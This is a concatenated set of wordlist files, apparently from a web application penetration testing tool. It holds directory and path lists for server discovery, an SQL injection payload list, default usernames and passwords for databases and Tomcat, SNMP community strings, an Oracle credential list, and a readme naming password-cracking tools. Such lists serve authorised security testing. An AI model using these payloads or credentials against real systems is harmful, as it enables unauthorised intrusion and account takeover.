16 | ca 17 | ca 18 | cgi-bin 19 | config 20 | dirb_random.cgi 21 | dirb_random.jsp 22 | dirb_random.shtml 23 | docs 24 | dsgw 25 | help 26 | index.html 27 | jsp 28 | manual 29 | mc-icons 30 | netshare 31 | ns-icons 32 | publisher 33 | search 34 | search-ui 35 | servlet 36 | servlets 37 | -------------------------------------------------------------------------------- 
/wordlist/vulns/jrun.txt: -------------------------------------------------------------------------------- 1 | SmarTicketApp/index.html 2 | WEB-INF/webapp.properties 3 | WEB-INF/web.xml 4 | compass/logon.jsp 5 | databasenotes.html 6 | flash/java/javabean/FlashJavaBean.html 7 | jrunscripts 8 | jstl-war/index.html 9 | techniques/servlets/index.html 10 | travelnet/home.jsp 11 | worldmusic/action/cdlist 12 | worldmusic/action/catalog 13 | ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlist/vulns/netware.txt: -------------------------------------------------------------------------------- 1 | ICHAINErrors 2 | ICSLogin 3 | ICHAINLogout 4 | ICSIBroker 5 | NetStorage 6 | iManager 7 | eMFrame 8 | oneNet 9 | ICHAIN 10 | ICS 11 | NSearch 12 | SearchServlet 13 | site 14 | home.html 15 | iFolder 16 | update 17 | webacc 18 | nps 19 | -------------------------------------------------------------------------------- /wordlist/vulns/oracle9i.txt: -------------------------------------------------------------------------------- 1 | CookieExample 2 | Counter 3 | DateServlet 4 | HelloWorldServlet 5 | RequestParamExample 6 | SessionExample 7 | SessionServlet 8 | SimpleServlet 9 | SnoopServlet 10 | basic 11 | cal 12 | cgi-bin 13 | echo 14 | examples 15 | fcgi-bin 16 | hellouser 17 | hellouser.jsp 18 | j2ee 19 | jsp 20 | login.html 21 | ojspdemos 22 | perl 23 | printenv 24 | servlet 25 | simple 26 | snoop.jsp 27 | snp 28 | usebean.jsp 29 | welcomeuser.jsp 30 | -------------------------------------------------------------------------------- /wordlist/vulns/sql_inj.txt: -------------------------------------------------------------------------------- 1 | ' 2 | --ora_sqls 3 | #mysql 4 | '#mysql 5 | and 1=1 6 | and USER=USER 7 | and user()=user() 8 | and 2=0 9 | or 2=2 10 | ' and '2'='2 11 | ' and '2'='0 12 | ' or '2'='2 13 | /*ora_mysql*/and/**/2=2 14 | /*ora_mysql*/and/**/2=0 15 | '/*ora_mysql*/and/**/'2'='2 16 | 
'/*ora_mysql*/and/**/'2'='0 17 | '/*ora_mysql*/or/**/'2'='2 18 | and 2=2#mysql 19 | and 2=0#mysql 20 | and 2=2-- oracle_mysql 21 | and 2=0-- oracle_mysql 22 | ' and '2'='2'#mysql 23 | ' and '2'='0'#mysql 24 | ' and '2'='2'-- oracle 25 | ' and '2'='0'-- oracle 26 | 999999999999999999 27 | 1e100 28 | 2 or 2=2 29 | 2' or '2'='2 30 | order by 1-- 31 | admin'-- 32 | admin' 33 | 'test 34 | 'test-- 35 | ' or 1=1-- 36 | or 1=1-- 37 | or 1=1 38 | or 1=1# 39 | " or 1=1# 40 | admin'# 41 | now() 42 | 43 | -------------------------------------------------------------------------------- /wordlist/vulns/sunas.txt: -------------------------------------------------------------------------------- 1 | ias-samples 2 | ias-samples/index.html 3 | index.html 4 | cgi-bin 5 | cgi-bin/gx.cgi 6 | cgi-bin/gx.dll 7 | cgi-bin/gx.exe 8 | gx 9 | gx.cgi 10 | gx.exe 11 | GXApp 12 | GXApp/index.html 13 | GXApp/COnlineBank 14 | GXApp/COnlineBank/COBLogin.html 15 | GXApp/CSample 16 | GXApp/CSample/index.html 17 | GXApp/images 18 | GXApp/OnlineBank 19 | GXApp/OnlineBank/OBLogin.html 20 | fortune 21 | NASApp/fortune/fortune 22 | lotery 23 | COnlineBank 24 | CSample 25 | OnlineBank 26 | NASApp 27 | NASApp/system 28 | NASApp/system/ValidationError.jsp 29 | NASApp/system/ExceptionThrown.jsp 30 | NASApp/system/JSPRunner 31 | NASApp/system/JSPRunnerSticky 32 | NASApp/system/SessionInvalidator 33 | NASApp/system/StaticServlet 34 | NASApp/system/WelcomeListServlet 35 | NASApp/system/FormAuthServlet 36 | NASApp/system/CertAuthServlet 37 | NASApp/system/BasicAuthServlet 38 | system 39 | ValidationError.jsp 40 | ExceptionThrown.jsp 41 | JSPRunner 42 | JSPRunnerSticky 43 | SessionInvalidator 44 | StaticServlet 45 | WelcomeListServlet 46 | FormAuthServlet 47 | CertAuthServlet 48 | BasicAuthServlet 49 | com.netscape.server.servlet.jsp.JSPRunner 50 | servlet 51 | classes 52 | 53 | -------------------------------------------------------------------------------- /wordlist/vulns/tests.txt: 
-------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | 35 | -------------------------------------------------------------------------------- /wordlist/vulns/tomcat.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | 
servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | -------------------------------------------------------------------------------- /wordlist/vulns/vignette.txt: -------------------------------------------------------------------------------- 1 | 0,,,00 2 | 0,,,00.html 3 | 1,,,00 4 | 1,,,00.html 5 | CDA 6 | CDS 7 | CMA 8 | CMS 9 | Deleting 10 | Docs 11 | Editing 12 | HOME 13 | Images 14 | Internal 15 | MetaDataUpdate 16 | Report 17 | Select 18 | StoryServer 19 | TMT 20 | VGN 21 | XML 22 | ac 23 | allvars 24 | asp 25 | aspstatus 26 | cda 27 | cds 28 | cma 29 | cms 30 | controller 31 | diag 32 | docs 33 | edit 34 | error 35 | errorpage 36 | errors 37 | executequery 38 | external 39 | home 40 | ibm 41 | initialize 42 | internal 43 | jsp 44 | jspstatus 45 | jsptest 46 | legacy 47 | license 48 | listcolumns 49 | login 50 | loginlogo 51 | logo 52 | main 53 | menu 54 | metadataupdate 55 | performance 56 | portal 57 | ppstats 58 | preview 59 | previewer 60 | record 61 | reset 62 | save 63 | stat 64 | status 65 | storyserver 66 | style 67 | stylepreviewer 68 | utils 69 | vdc 70 | vgn 71 | vr 72 | Ping.jsp 73 | HelloWorld.jsp 74 | 75 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-dirs.txt: -------------------------------------------------------------------------------- 1 | ServiceDefinition 2 | admin 3 | atom 4 | axis 5 | context 6 | default 7 | disco 8 | extwsdl 9 | index 10 | inquire 11 | 
inquiryapi 12 | inspection 13 | interface 14 | interfaces 15 | jboss-net 16 | jbossws 17 | juddi 18 | manual 19 | methods 20 | name 21 | names 22 | operation 23 | operations 24 | oracle 25 | proxy 26 | publish 27 | publishing 28 | query 29 | rss 30 | service 31 | services 32 | svce 33 | uddi 34 | uddiexplorer 35 | uddigui 36 | uddilistener 37 | uddisoap 38 | webservice 39 | webserviceclient 40 | webserviceclient+ssl 41 | webservices 42 | ws 43 | ws4ee 44 | wsatom 45 | wsdl 46 | wsgw 47 | wsil 48 | xmethods 49 | -------------------------------------------------------------------------------- /wordlist/webservices/ws-files.txt: -------------------------------------------------------------------------------- 1 | 2 | .asmx 3 | .asmx?wsdl 4 | .aspx 5 | .atom 6 | .disco 7 | .html 8 | .java 9 | .jsp 10 | .jws 11 | .jws?wsdl 12 | .php 13 | .pl 14 | .py 15 | .rss 16 | .svc 17 | .wsdl 18 | ?disco 19 | ?wsdl 20 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/accidental_profanity.txt: -------------------------------------------------------------------------------- 1 | Scunthorpe General Hospital 2 | Penistone Community Church 3 | Lightwater Country Park 4 | Jimmy Clitheroe 5 | Horniman Museum 6 | shitake mushrooms 7 | RomansInSussex.co.uk 8 | http://www.cum.qc.ca/ 9 | Craig Cockburn, Software Specialist 10 | Linda Callahan 11 | Dr. Herman I. 
Libshitz 12 | magna cum laude 13 | Super Bowl XXX 14 | medieval erection of parapets 15 | evaluate 16 | mocha 17 | expression 18 | Arsenal canal 19 | classic 20 | Tyson Gay 21 | Dick Van Dyke 22 | basement 23 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/common-http-ports.txt: -------------------------------------------------------------------------------- 1 | 66 2 | 80 3 | 81 4 | 443 5 | 445 6 | 457 7 | 1080 8 | 1100 9 | 1241 10 | 1352 11 | 1433 12 | 1434 13 | 1521 14 | 1944 15 | 2301 16 | 3128 17 | 3306 18 | 4000 19 | 4001 20 | 4002 21 | 4100 22 | 5000 23 | 5432 24 | 5800 25 | 5801 26 | 5802 27 | 6346 28 | 6347 29 | 7001 30 | 7002 31 | 8080 32 | 8888 33 | 30821 34 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/numeric.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 1.00 4 | $1.00 5 | 1/2 6 | 1E2 7 | 1E02 8 | 1E+02 9 | -1 10 | -1.00 11 | -$1.00 12 | -1/2 13 | -1E2 14 | -1E02 15 | -1E+02 16 | 1/0 17 | 0/0 18 | -2147483648/-1 19 | -9223372036854775808/-1 20 | -0 21 | -0.0 22 | +0 23 | +0.0 24 | 0.00 25 | 0..0 26 | . 27 | 0.0.0 28 | 0,00 29 | 0,,0 30 | , 31 | 0,0,0 32 | 0.0/0 33 | 1.0/0.0 34 | 0.0/0.0 35 | 1,0/0,0 36 | 0,0/0,0 37 | --1 38 | - 39 | -. 
40 | -, 41 | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 42 | NaN 43 | Infinity 44 | -Infinity 45 | INF 46 | 1#INF 47 | -1#IND 48 | 1#QNAN 49 | 1#SNAN 50 | 1#IND 51 | 0x0 52 | 0xffffffff 53 | 0xffffffffffffffff 54 | 0xabad1dea 55 | 123456789012345678901234567890123456789 56 | 1,000.00 57 | 1 000.00 58 | 1'000.00 59 | 1,000,000.00 60 | 1 000 000.00 61 | 1'000'000.00 62 | 1.000,00 63 | 1 000,00 64 | 1'000,00 65 | 1.000.000,00 66 | 1 000 000,00 67 | 1'000'000,00 68 | 01000 69 | 08 70 | 09 71 | 2.2250738585072011e-308 72 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-alphanumeric-case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-common-snmp-community-strings.txt: -------------------------------------------------------------------------------- 1 | public 2 | private 3 | 0 4 | 0392a0 5 | 1234 6 | 2read 7 | 4changes 8 | ANYCOM 9 | Admin 10 | C0de 11 | CISCO 12 | CR52401 13 | IBM 14 | ILMI 15 | Intermec 16 | NoGaH$@! 
17 | OrigEquipMfr 18 | PRIVATE 19 | PUBLIC 20 | Private 21 | Public 22 | SECRET 23 | SECURITY 24 | SNMP 25 | SNMP_trap 26 | SUN 27 | SWITCH 28 | SYSTEM 29 | Secret 30 | Security 31 | s!a@m#n$p%c 32 | Switch 33 | System 34 | TENmanUFactOryPOWER 35 | TEST 36 | access 37 | adm 38 | admin 39 | agent 40 | agent_steal 41 | all 42 | all private 43 | all public 44 | apc 45 | bintec 46 | blue 47 | c 48 | cable-d 49 | canon_admin 50 | cc 51 | cisco 52 | community 53 | core 54 | debug 55 | default 56 | dilbert 57 | enable 58 | field 59 | field-service 60 | freekevin 61 | fubar 62 | guest 63 | hello 64 | hp_admin 65 | ibm 66 | ilmi 67 | intermec 68 | internal 69 | l2 70 | l3 71 | manager 72 | mngt 73 | monitor 74 | netman 75 | network 76 | none 77 | openview 78 | pass 79 | password 80 | pr1v4t3 81 | proxy 82 | publ1c 83 | read 84 | read-only 85 | read-write 86 | readwrite 87 | red 88 | regional 89 | rmon 90 | rmon_admin 91 | ro 92 | root 93 | router 94 | rw 95 | rwa 96 | san-fran 97 | sanfran 98 | scotty 99 | secret 100 | security 101 | seri 102 | snmp 103 | snmpd 104 | snmptrap 105 | solaris 106 | sun 107 | superuser 108 | switch 109 | system 110 | tech 111 | test 112 | test2 113 | tiv0li 114 | tivoli 115 | trap 116 | world 117 | write 118 | xyzzy 119 | yellow 120 | -------------------------------------------------------------------------------- /wordlist/wordlists-misc/wordlist-dna.txt: -------------------------------------------------------------------------------- 1 | a 2 | t 3 | c 4 | g 5 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_pass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | db2pass 5 | db2pw 6 | db2password 7 | admin 8 | db2admin 9 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_user.txt: 
-------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | admin 5 | db2admin 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/db2/db2_default_userpass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 db2inst1 2 | db2inst1 db2pass 3 | db2inst1 db2pw 4 | db2inst1 db2password 5 | dasusr1 dasusr1 6 | db2fenc1 db2fenc1 7 | db2admin db2admin 8 | 9 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | manager 4 | letmein 5 | cisco 6 | default 7 | root 8 | apc 9 | pass 10 | security 11 | user 12 | system 13 | sys 14 | none 15 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_userpass.txt: -------------------------------------------------------------------------------- 1 | # needs help 2 | connect connect 3 | sitecom sitecom 4 | admin 1234 5 | cisco cisco 6 | cisco sanfran 7 | private private 8 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/generic-listpairs/http_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | root 4 | cisco 5 | apc 6 | pass 7 | security 8 | user 9 | system 10 | sys 11 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/oracle/_hci_oracle_passwords.txt: -------------------------------------------------------------------------------- 1 | "AMBU,hacschema" 2 | "QUEUE_USER,qmanager" 3 | "SYS,alLp0ver2" 4 | "SYSTEM,urA7mvP" 5 | "CHANGEMGR,datacontrol" 6 | "CCDEV,ccdev" 7 | 
"CCDBA,ccnulls " 8 | "CCDATA,ccdata" 9 | "CCFORMS,ccforms" 10 | "CCINTERFACE,ccinterface" 11 | "MCKHEO,mckheo" 12 | "CCREL,ccrel" 13 | "CCQUERY,ccquery" 14 | "CDXWEB,winplu5" 15 | "DRUG1,fdb3schema" 16 | "DRUG2,fdb3schema" 17 | "enc_ent,encent" 18 | "ENT,entpazz" 19 | "ENT_CONFIG,ent_configpazz" 20 | "ADF,adfpazz" 21 | "INF,infpazz" 22 | "INF_CONFIG,inf_configpazz" 23 | "SDM,sdmpazz" 24 | "STRMADM,pazzw0rd" 25 | "ENT_AUD,pazzw0rd" 26 | "ENT_ARCH,pazzw0rd" 27 | "POC_ARCH,pazzw0rd" 28 | "POC_AQ,qmanager" 29 | "INF_AQ,qmanager" 30 | "DATAMGR,datamgr" 31 | "CCUSER,bueno" 32 | "ALERTS,monitorhca" 33 | "HCALERTS,alertsuser" 34 | "AM,ampazz" 35 | "AM_AUD,pazzw0rd" 36 | "AUD,audpazz" 37 | "TMF,tmfpazz" 38 | "MN,mnpazz" 39 | "EH,ehpazz" 40 | "NG,ngpazz" 41 | "DM,dmpazz" 42 | "DMTOOL,dmtoolpazz" 43 | "STG_DMT,stg_dmtpazz" 44 | "WRL,wrlpazz" 45 | "NOTES,notespazz" 46 | "REPORTS,reportspazz" 47 | "ICONS,iconspazz" 48 | "BS,bspazz" 49 | "QZ,qzpazz" 50 | "RM,rmpazz" 51 | "RM_AUD,pazzw0rd" 52 | "COMMGR,commgrpazz" 53 | "OPSERVICE,opservicepazz" 54 | "SEC_CONFIG,sec_configpazz" 55 | "CTXSYS,ctxsyspazz" 56 | "OLOGY,ologypazz" 57 | "OLOGY_CONFIG,ology_configpazz" 58 | "DOC,docpazz" 59 | "DOC_CONFIG,doc_configpazz" 60 | "PORTAL,portal" 61 | "PORTAL_INSTALL,portal_install" 62 | "EBIDBADMIN,ebidbadmin" 63 | "DESIGN_OWNER,owb" 64 | "OWB_RUNTIME_REPOSITORY,owb" 65 | "RUNTIME_A_USER,owb" 66 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/passwds/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/wordlists-user-passwd/passwds/phpbb.txt -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | tiger 3 | 
postgres 4 | password 5 | admin 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_user.txt: -------------------------------------------------------------------------------- 1 | postgres 2 | scott 3 | admin 4 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/postgres/postgres_default_userpass.txt: -------------------------------------------------------------------------------- 1 | postgres postgres 2 | postgres password 3 | postgres admin 4 | admin admin 5 | admin password 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | various notes 3 | 4 | leetspeak filter 5 | cat plain.wordlist | sed -e 's/a/4/g' -e 's/e/3/g' -e 's/i/1/g' -e 's/o/0/g' -e 's/s/5/g' -e 's/t/7/g' > l337.wordlist 6 | 7 | more wordlists 8 | ftp://ftp.ox.ac.uk/pub/wordlists/ 9 | http://theargon.com/achilles/wordlists/ 10 | http://www.totse.com/en/hack/word_lists/index.html 11 | http://www.outpost9.com/files/WordLists.html 12 | http://packetstormsecurity.org/Crackers/wordlists/ 13 | 14 | passwd brute force tools 15 | 16 | cupp - passwd profiler 17 | http://www.remote-exploit.org/?page_id=506 18 | 19 | awlg - associative wordlist generator 20 | http://awlg.org/index.gen 21 | 22 | thc-hydra 23 | http://freeworld.thc.org/thc-hydra/ 24 | 25 | cain & abel 26 | http://www.oxid.it/cain.html 27 | 28 | jtr 29 | http://www.openwall.com/john/ 30 | 31 | lcp - free l0phtcrack replacement 32 | http://www.lcpsoft.com/english/download.htm 33 | 34 | 35 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 
manager 3 | role1 4 | root 5 | tomcat 6 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_userpass.txt: -------------------------------------------------------------------------------- 1 | j2deployer j2deployer 2 | ovwebusr OvW*busr1 3 | cxsdk kdsxc 4 | root owaspbwa 5 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/tomcat/tomcat_mgr_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | both 7 | -------------------------------------------------------------------------------- /wordlist/wordlists-user-passwd/unix-os/unix_users.txt: -------------------------------------------------------------------------------- 1 | 4Dgifts 2 | EZsetup 3 | OutOfBox 4 | ROOT 5 | adm 6 | admin 7 | administrator 8 | anon 9 | auditor 10 | avahi 11 | avahi-autoipd 12 | backup 13 | bbs 14 | bin 15 | checkfs 16 | checkfsys 17 | checksys 18 | cmwlogin 19 | couchdb 20 | daemon 21 | dbadmin 22 | demo 23 | demos 24 | diag 25 | distccd 26 | dni 27 | fal 28 | fax 29 | ftp 30 | games 31 | gdm 32 | gnats 33 | gopher 34 | gropher 35 | guest 36 | haldaemon 37 | halt 38 | hplip 39 | informix 40 | install 41 | irc 42 | kernoops 43 | libuuid 44 | list 45 | listen 46 | lp 47 | lpadm 48 | lpadmin 49 | lynx 50 | mail 51 | man 52 | me 53 | messagebus 54 | mountfs 55 | mountfsys 56 | mountsys 57 | news 58 | noaccess 59 | nobody 60 | nobody4 61 | nuucp 62 | nxpgsql 63 | operator 64 | oracle 65 | popr 66 | postgres 67 | postmaster 68 | printer 69 | proxy 70 | pulse 71 | rfindd 72 | rje 73 | root 74 | rooty 75 | saned 76 | service 77 | setup 78 | sgiweb 79 | sigver 80 | speech-dispatcher 81 | sshd 82 | sym 83 | symop 84 | sync 85 | sys 86 | sysadm 87 | sysadmin 88 | sysbin 89 | syslog 90 | system_admin 91 | trouble 92 | udadmin 93 | ultra 94 | umountfs 95 | 
umountfsys 96 | umountsys 97 | unix 98 | us_admin 99 | user 100 | uucp 101 | uucpadm 102 | web 103 | webmaster 104 | www 105 | www-data 106 | xpdb 107 | xpopr 108 | zabbix 109 | --------------------------------------------------------------------------------